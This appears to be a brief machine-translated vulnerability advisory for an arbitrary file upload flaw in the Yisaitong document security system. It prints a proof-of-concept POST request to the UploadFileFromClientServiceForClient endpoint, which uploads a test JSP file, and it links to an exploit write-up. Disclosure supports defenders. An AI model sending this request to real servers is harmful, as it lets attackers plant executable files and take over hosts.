Yisaitong Electronic Document Security Management System Uploadfilefromclientserviceforclient Any File Upload Vulnerability
Yisaitong Electronic Document Security Management System Uploadfilefromclientserviceforclient Any File Upload Vulnerability
Yisaitong Electronic Document Security Management System UploadFileFromClientServiceForClient Any file upload vulnerability
Vulnerability Description
Yisaitong Electronic Document Security Management System The UploadFileFromClientServiceForClient interface has a vulnerability to upload any file to the server through the vulnerability and obtain host permissions.
Vulnerability Impact
Yisetong Electronic Document Security Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Content-Length: 1
Test
/tttT.jsp
Reference link
https://github.com/di0xide-U/YSTupload/blob/main/exp.md
This post is licensed under CC BY 4.0 by the author.